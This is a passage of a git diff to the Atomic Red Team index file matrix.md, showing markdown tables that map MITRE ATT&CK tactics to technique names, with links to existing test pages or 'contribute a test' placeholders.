| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Screen Capture](../../T1113/T1113.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | [Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | [Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
atomics/Indexes/Matrices/matrix.md
+120 -149
View File
@@ -1,170 +1,141 @@
# All Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [Cloud Accounts](../../T1078.004/T1078.004.md) | [AppleScript](../../T1059.002/T1059.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Storage Object Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Replication Through Removable Media](../../T1091/T1091.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DCSync](../../T1003.006/T1003.006.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
